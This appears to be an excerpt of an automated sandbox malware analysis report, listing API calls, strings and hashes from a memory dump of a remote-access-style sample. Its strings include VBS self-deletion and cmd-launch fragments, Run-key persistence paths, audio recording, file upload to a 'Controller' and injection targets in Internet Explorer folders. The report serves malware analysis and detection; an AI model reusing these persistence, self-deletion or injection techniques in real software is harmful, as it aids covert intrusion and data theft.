                                                                                                      • Part of subcall function 0040A7F2: TerminateThread.KERNEL32(Function_00009305,00000000,004721E8,0040BC76,?,00472200,pth_unenc,004721E8), ref: 0040A801
                                                                                                      • Part of subcall function 0040A7F2: UnhookWindowsHookEx.USER32(?), ref: 0040A811
                                                                                                      • Part of subcall function 0040A7F2: TerminateThread.KERNEL32(004092EF,00000000,?,00472200,pth_unenc,004721E8), ref: 0040A823
                                                                                                      • Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,75923530,00000000,?,?,?,?,00469654,0040BDCB,.vbs,?,?,?,?,?,00472200), ref: 00419980
                                                                                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040BFD0
                                                                                                    • ExitProcess.KERNEL32 ref: 0040BFD7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                    • String ID: ")$.vbs$H"G$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                                                                                    • API String ID: 3797177996-2974882535
                                                                                                    • Opcode ID: 45447365fd438036058cd3b66ceca770338a4b58030b0b1a4f9f6e3f675c0f6d
                                                                                                    • Instruction ID: 6c8f8b33712d81dc7036d24bc004af62d002185c7e194acf753e7914dc64dab3
                                                                                                    • Opcode Fuzzy Hash: 45447365fd438036058cd3b66ceca770338a4b58030b0b1a4f9f6e3f675c0f6d
                                                                                                    • Instruction Fuzzy Hash: DD816E716042405AC714FB62D8929EF77A8AF90708F10443FF586A71E2EF789E49C69E
                                                                                                    APIs
                                                                                                    • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 004190F2
                                                                                                    • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 00419106
                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00463050), ref: 0041912E
                                                                                                    • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00471E78,00000000), ref: 00419144
                                                                                                    • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 00419185
                                                                                                    • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041919D
                                                                                                    • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 004191B2
                                                                                                    • SetEvent.KERNEL32 ref: 004191CF
                                                                                                    • WaitForSingleObject.KERNEL32(000001F4), ref: 004191E0
                                                                                                    • CloseHandle.KERNEL32 ref: 004191F0
                                                                                                    • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 00419212
                                                                                                    • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041921C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                                    • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                                                                                                    • API String ID: 738084811-1354618412
                                                                                                    • Opcode ID: 7ee231967584c923912fc0a6995a0b1496ba2b121e3e8896045f64c6575b1494
                                                                                                    • Instruction ID: 6660e32d934ed13bda46fa62e77153e47455c80990ba371f4f5bcee5a70a39dd
                                                                                                    • Opcode Fuzzy Hash: 7ee231967584c923912fc0a6995a0b1496ba2b121e3e8896045f64c6575b1494
                                                                                                    • Instruction Fuzzy Hash: 6C5191712043056BD604FB75DC96EBF369CDB81398F10053FF44A621E2EE789D898A6E
                                                                                                    APIs
                                                                                                    • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AB9
                                                                                                    • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401AE3
                                                                                                    • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401AF3
                                                                                                    • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B03
                                                                                                    • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B13
                                                                                                    • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B23
                                                                                                    • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B34
                                                                                                    • WriteFile.KERNEL32(00000000,0046FA9A,00000002,00000000,00000000), ref: 00401B45
                                                                                                    • WriteFile.KERNEL32(00000000,0046FA9C,00000004,00000000,00000000), ref: 00401B55
                                                                                                    • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B65
                                                                                                    • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B76
                                                                                                    • WriteFile.KERNEL32(00000000,0046FAA6,00000002,00000000,00000000), ref: 00401B87
                                                                                                    • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401B97
                                                                                                    • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BA7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: File$Write$Create
                                                                                                    • String ID: RIFF$WAVE$data$fmt
                                                                                                    • API String ID: 1602526932-4212202414
                                                                                                    • Opcode ID: e953cdad80a2b5f15463d19f06cbbe214ca4708b9acf4e214683fef01c63ba87
                                                                                                    • Instruction ID: fa9573d22dfebaa7cc70b9682dc8642ba3498ee27ac2ec60dc87a96e6c13d219
                                                                                                    • Opcode Fuzzy Hash: e953cdad80a2b5f15463d19f06cbbe214ca4708b9acf4e214683fef01c63ba87
                                                                                                    • Instruction Fuzzy Hash: 46416F726543197AE210DB91DD85FBB7EECEB85B50F40042AF648D6080E7A4E909DBB3
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _free$EnvironmentVariable$_wcschr
                                                                                                    • String ID:
                                                                                                    • API String ID: 3899193279-0
                                                                                                    • Opcode ID: 8f8f6bf8198f661361f87136ecb7ebf93a417bae196628050410ce4dfb3fc85f
                                                                                                    • Instruction ID: f90cfe9d57a3c7213274ca364bab7ea13f4483d5bd7e80e8c07ab134bc70d503
                                                                                                    • Opcode Fuzzy Hash: 8f8f6bf8198f661361f87136ecb7ebf93a417bae196628050410ce4dfb3fc85f
                                                                                                    • Instruction Fuzzy Hash: 80D136719023007BFB60AF7598C166B7BA4AF15718F09817FF985A7381FB3989008B5D
                                                                                                    APIs
                                                                                                    • ___free_lconv_mon.LIBCMT ref: 0044E4EA
                                                                                                      • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D6FF
                                                                                                      • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D711
                                                                                                      • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D723
                                                                                                      • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D735
                                                                                                      • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D747
                                                                                                      • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D759
                                                                                                      • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D76B
                                                                                                      • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D77D
                                                                                                      • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D78F
                                                                                                      • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7A1
                                                                                                      • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7B3
                                                                                                      • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7C5
                                                                                                      • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7D7
                                                                                                    • _free.LIBCMT ref: 0044E4DF
                                                                                                      • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                                                                                      • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                                                                                    • _free.LIBCMT ref: 0044E501
                                                                                                    • _free.LIBCMT ref: 0044E516
                                                                                                    • _free.LIBCMT ref: 0044E521
                                                                                                    • _free.LIBCMT ref: 0044E543
                                                                                                    • _free.LIBCMT ref: 0044E556
                                                                                                    • _free.LIBCMT ref: 0044E564
                                                                                                    • _free.LIBCMT ref: 0044E56F
                                                                                                    • _free.LIBCMT ref: 0044E5A7
                                                                                                    • _free.LIBCMT ref: 0044E5AE
                                                                                                    • _free.LIBCMT ref: 0044E5CB
                                                                                                    • _free.LIBCMT ref: 0044E5E3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                    • String ID: pF
                                                                                                    • API String ID: 161543041-2973420481
                                                                                                    • Opcode ID: b166b7e86ef1a7ddfa2e36ec319a6e916c21ca5d81851e2e5517d42b5c42f7b7
                                                                                                    • Instruction ID: 6e8371ae3b83bc2427c047bff221b97f6cd80994471b0a2caeb41cff5b169df7
                                                                                                    • Opcode Fuzzy Hash: b166b7e86ef1a7ddfa2e36ec319a6e916c21ca5d81851e2e5517d42b5c42f7b7
                                                                                                    • Instruction Fuzzy Hash: D4315072500304AFFB205E7AD945B5BB3E5BF00719F55851FE488D6251EE39ED408B18
                                                                                                    APIs
                                                                                                    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0041382B
                                                                                                    • LoadLibraryA.KERNEL32(?), ref: 0041386D
                                                                                                    • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0041388D
                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00413894
                                                                                                    • LoadLibraryA.KERNEL32(?), ref: 004138CC
                                                                                                    • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 004138DE
                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 004138E5
                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 004138F4
                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 0041390B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                                                    • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                                                    • API String ID: 2490988753-744132762
                                                                                                    • Opcode ID: 21b812c9e8c8c8e619d1227956d82128857f9ec353fd6b4c7c84cf26c4fc7a8e
                                                                                                    • Instruction ID: d28fd91e0c22c3548fe93de424e57890752fc739e59a71d3c7449bb4191d4936
                                                                                                    • Opcode Fuzzy Hash: 21b812c9e8c8c8e619d1227956d82128857f9ec353fd6b4c7c84cf26c4fc7a8e
                                                                                                    • Instruction Fuzzy Hash: 8831C0B2502315ABC720AF25DC489CBBBEC9F48755F41062AF84593251E7B8CE8486AE
                                                                                                    APIs
                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 004118B2
                                                                                                      • Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,75923530,00000000,?,?,?,?,00469654,0040BDCB,.vbs,?,?,?,?,?,00472200), ref: 00419980
                                                                                                      • Part of subcall function 004168A6: CloseHandle.KERNEL32(004040D5,?,?,004040D5,00462E24), ref: 004168BC
                                                                                                      • Part of subcall function 004168A6: CloseHandle.KERNEL32($.F,?,?,004040D5,00462E24), ref: 004168C5
                                                                                                    • Sleep.KERNEL32(0000000A,00462E24), ref: 00411A01
                                                                                                    • Sleep.KERNEL32(0000000A,00462E24,00462E24), ref: 00411AA3
                                                                                                    • Sleep.KERNEL32(0000000A,00462E24,00462E24,00462E24), ref: 00411B42
                                                                                                    • DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411B9F
                                                                                                    • DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411BCF
                                                                                                    • DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411C05
                                                                                                    • Sleep.KERNEL32(000001F4,00462E24,00462E24,00462E24), ref: 00411C25
                                                                                                    • Sleep.KERNEL32(00000064), ref: 00411C63
                                                                                                      • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                                                    • String ID: /stext "$$.F$@#G$@#G
                                                                                                    • API String ID: 1223786279-2596709126
                                                                                                    • Opcode ID: cbf778e88f98837d315c4bcc92349f0fdda0b1e36815e455587155ffc232fea6
                                                                                                    • Instruction ID: f36e1428a9e5a2dc2e21cca38a330b771dfaab2ce7ac60874593ee94e899fa44
                                                                                                    • Opcode Fuzzy Hash: cbf778e88f98837d315c4bcc92349f0fdda0b1e36815e455587155ffc232fea6
                                                                                                    • Instruction Fuzzy Hash: 1CF154311083415AD328FB65D896AEFB3D5AFD0348F40093FF586521E2EF789A4DC69A
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _free
                                                                                                    • String ID: pF
                                                                                                    • API String ID: 269201875-2973420481
                                                                                                    • Opcode ID: 2d61484940682ee786660686f26dc7be5fdbe1d580820abb244bed0f912383bb
                                                                                                    • Instruction ID: 42ad863364e9847d0c0ab7d3fc56807329b255bf3c924c15ca724e031f0c4a7b
                                                                                                    • Opcode Fuzzy Hash: 2d61484940682ee786660686f26dc7be5fdbe1d580820abb244bed0f912383bb
                                                                                                    • Instruction Fuzzy Hash: 4CC17576D40204ABEB20DFA9CC82FEE77F8AF09B05F154156FE04FB282D674A9458754
                                                                                                    APIs
                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00472248,00471FFC,?,00000001), ref: 0040DE4E
                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000001), ref: 0040DE79
                                                                                                    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040DE95
                                                                                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040DF14
                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000001), ref: 0040DF23
                                                                                                      • Part of subcall function 00419F87: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 00419F9C
                                                                                                    • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001), ref: 0040E047
                                                                                                    • CloseHandle.KERNEL32(00000000,C:\Program Files(x86)\Internet Explorer\,?,00000001), ref: 0040E133
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CloseCreateHandleProcess32$FileFirstModuleMutexNameNextOpenProcessSnapshotToolhelp32
                                                                                                    • String ID: 0"G$C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$!G
                                                                                                    • API String ID: 193334293-3226144251
                                                                                                    • Opcode ID: cb9fd93142555b9dcf32b4a9353eb8e96a53809805eacc63fb901cd543d6ef3e
                                                                                                    • Instruction ID: 8a3cf51a80cb2752f7e3b1027b115d9c77e2b7a511041fa54b012784d9d6af0a
                                                                                                    • Opcode Fuzzy Hash: cb9fd93142555b9dcf32b4a9353eb8e96a53809805eacc63fb901cd543d6ef3e
                                                                                                    • Instruction Fuzzy Hash: DB8121305083419BCA54FB61D8919EEB7E4AFA0348F40493FF586631E2EF78994DC75A
                                                                                                    APIs
                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041A43B
                                                                                                    • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041A47F
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0041A749
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CloseEnumOpen
                                                                                                    • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                                                                    • API String ID: 1332880857-3714951968
                                                                                                    • Opcode ID: dcededb39bf263de4c0e491218869729ded1d12d81c3355e778ba101c7639554
                                                                                                    • Instruction ID: 699f57f5c891f1d806a7f6c627c3d9f808e7165cae3c76f1f7c8ebce292c0808
                                                                                                    • Opcode Fuzzy Hash: dcededb39bf263de4c0e491218869729ded1d12d81c3355e778ba101c7639554
                                                                                                    • Instruction Fuzzy Hash: BC8152311183419BC328EB51D891EEFB7E8EF94348F10493FF586921E2EF749949CA5A
                                                                                                    APIs
                                                                                                    • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041B38F
                                                                                                    • GetCursorPos.USER32(?), ref: 0041B39E
                                                                                                    • SetForegroundWindow.USER32(?), ref: 0041B3A7
                                                                                                    • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041B3C1
                                                                                                    • Shell_NotifyIconA.SHELL32(00000002,00471AE0), ref: 0041B412
                                                                                                    • ExitProcess.KERNEL32 ref: 0041B41A
                                                                                                    • CreatePopupMenu.USER32 ref: 0041B420
                                                                                                    • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041B435
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                                    • String ID: Close
                                                                                                    • API String ID: 1657328048-3535843008
                                                                                                    • Opcode ID: a6176c0d6380f4aee2a94f66beec31abf772cd011930890969aeab0fce4376ca
                                                                                                    • Instruction ID: 8a5f592793453ec618f968136b1e584160f7030753e38ead18fcaf25e3e96fa7
                                                                                                    • Opcode Fuzzy Hash: a6176c0d6380f4aee2a94f66beec31abf772cd011930890969aeab0fce4376ca
                                                                                                    • Instruction Fuzzy Hash: EB211B31110209BFDF054FA4ED0DAAA3F75FB04302F458125F906D2176D7B5D9A0AB59
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _free$Info
                                                                                                    • String ID:
                                                                                                    • API String ID: 2509303402-0
                                                                                                    • Opcode ID: 2f053ac60eb79ec191c053a7fddcedd63e35585dd27580e6f5fea4236b9889f4
                                                                                                    • Instruction ID: c21780bae5ed168c96e0403295faec6c801d35bf5d84feaa2b3ea2b847582f92
                                                                                                    • Opcode Fuzzy Hash: 2f053ac60eb79ec191c053a7fddcedd63e35585dd27580e6f5fea4236b9889f4
                                                                                                    • Instruction Fuzzy Hash: 70B1D171900305AFEB11DF69C881BEEBBF4BF08705F14456EF588A7342DB799A418B24
                                                                                                    APIs
                                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407D1F
                                                                                                    • GetFileSizeEx.KERNEL32(00000000,?), ref: 00407D57
                                                                                                    • __aulldiv.LIBCMT ref: 00407D89
                                                                                                      • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                                                                      • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                                                                                    • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00407EAC
                                                                                                    • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00407EC7
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00407FA0
                                                                                                    • CloseHandle.KERNEL32(00000000,00000052), ref: 00407FEA
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00408038
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                                                                    • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller:
                                                                                                    • API String ID: 3086580692-2596673759
                                                                                                    • Opcode ID: 81922b257f5be7844af80214bb8f302956d65a317a536da01b83941640c53251
                                                                                                    • Instruction ID: 8e1224200a6c450cfdafa1dd663dcbd78fa1a86951e699dbe30fbedc525f5c9c
                                                                                                    • Opcode Fuzzy Hash: 81922b257f5be7844af80214bb8f302956d65a317a536da01b83941640c53251
                                                                                                    • Instruction Fuzzy Hash: 05B191316083409BC354FB65C891AAFB7E9AFD4314F40492FF489622D2EF789D458B8B
                                                                                                    APIs
                                                                                                      • Part of subcall function 004112B5: TerminateProcess.KERNEL32(00000000,004721E8,0040E2B2), ref: 004112C5
                                                                                                      • Part of subcall function 004112B5: WaitForSingleObject.KERNEL32(000000FF), ref: 004112D8
                                                                                                      • Part of subcall function 004120E8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,00472200), ref: 00412104
                                                                                                      • Part of subcall function 004120E8: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 0041211D
                                                                                                      • Part of subcall function 004120E8: RegCloseKey.ADVAPI32(00000000), ref: 00412128
                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C412
                                                                                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040C571
                                                                                                    • ExitProcess.KERNEL32 ref: 0040C57D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                                    • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$H"G$Temp$exepath$open
                                                                                                    • API String ID: 1913171305-2600661426
                                                                                                    • Opcode ID: 0985352d67ede4faadeedefeb2a10a50ad98f0bbfe51b8805d8953e628fb5825
                                                                                                    • Instruction ID: b2ba4f5629099335deb4bd311fc34f74cd7c7cff7cc2b9b794c872af44b42b62
                                                                                                    • Opcode Fuzzy Hash: 0985352d67ede4faadeedefeb2a10a50ad98f0bbfe51b8805d8953e628fb5825
                                                                                                    • Instruction Fuzzy Hash: 214132319001185ACB14FBA2DC96DEE7778AF50708F50017FF506B71E2EE785E4ACA99
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 65535$udp
                                                                                                    • API String ID: 0-1267037602
                                                                                                    • Opcode ID: 28a355c3c2c5299b67e9df14989e725b3f395b8ff7de4f3ce545a5dea485fe56
                                                                                                    • Instruction ID: 74e44cdacc71272d4b4fe4479ff5a2c38cc960f39e0e81ce023821ae7ff597b0
                                                                                                    • Opcode Fuzzy Hash: 28a355c3c2c5299b67e9df14989e725b3f395b8ff7de4f3ce545a5dea485fe56
                                                                                                    • Instruction Fuzzy Hash: 3151F1F5209302ABD7209E15C809BBB77D4AB84B52F08842FF8A1973D0D76CDEC0965E
                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00438632
                                                                                                    • GetLastError.KERNEL32(?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043863F
                                                                                                    • __dosmaperr.LIBCMT ref: 00438646
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00438672
                                                                                                    • GetLastError.KERNEL32(?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043867C
                                                                                                    • __dosmaperr.LIBCMT ref: 00438683
                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D35,?), ref: 004386C6
                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004386D0
                                                                                                    • __dosmaperr.LIBCMT ref: 004386D7
                                                                                                    • _free.LIBCMT ref: 004386E3
                                                                                                    • _free.LIBCMT ref: 004386EA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 2441525078-0
                                                                                                    • Opcode ID: 1b628504537381a0a5ac2c672ab802535bd9149362740fde115791ef092a347f
                                                                                                    • Instruction ID: 210192a7601cd99409c426d56dfac4e8df60f1af96207b6eb293af60208c7bc2
                                                                                                    • Opcode Fuzzy Hash: 1b628504537381a0a5ac2c672ab802535bd9149362740fde115791ef092a347f
                                                                                                    • Instruction Fuzzy Hash: 4E31B17280030ABBDF11AFA5DC469AF7B69AF08325F10425EF81056291DF39CD11DB69
                                                                                                    APIs
                                                                                                    Strings
